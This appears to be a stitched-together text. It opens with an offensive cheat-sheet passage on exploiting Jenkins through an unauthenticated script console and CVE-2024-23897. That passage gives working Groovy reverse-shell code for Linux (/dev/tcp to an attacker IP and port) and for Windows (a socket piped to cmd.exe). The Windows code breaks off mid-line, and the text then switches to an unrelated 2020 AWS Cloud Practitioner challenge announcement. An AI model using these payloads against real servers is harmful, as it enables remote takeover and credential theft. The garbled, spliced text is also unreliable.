Exploiting Jenkins / CVE-2024-23897

Often the script console is accessible without authentication, due to misconfiguration, at http://JENKINS_IP/script

If you don't have access to the script console and the version is vulnerable to CVE-2024-23897, then exploit it to read files and get authentication credentials for Jenkins (explained below).

Groovy scripts can be executed from the script console. To get a reverse shell, execute the following script.

For Linux,

    r = Runtime.getRuntime()
    p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/YOUR_IP/PORT;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
    p.waitFor()

For Windows,

    String host="YOUR_IP";
    int port=PORT;
    String cmd="cmd.exe";
    Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
    Socket s=new Socket(host,port);
    InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();
    OutputStream po=p.getOutputStrea...
Prepare for the AWS Certified Cloud Practitioner exam by participating in the AWS Certified Global Challenge. AWS offers free training, a free practice exam, suggested resources, and Q&A opportunities.
Registration link: https://pages.awscloud.com/takethechallenge.html
Registration will be open October 1 - December 31, 2020. To attend live training sessions, sign up by October 11, 2020. Registrants after October 11, 2020 will be able to review recorded training sessions. To be recognized for meeting the Get AWS Certified Global Challenge, take and pass your AWS Certified Cloud Practitioner exam on or before December 31, 2020.
AWS provides only the training and a practice exam voucher. To earn the Cloud Practitioner title, you need to take the AWS Cloud Practitioner Exam, which costs 100 USD.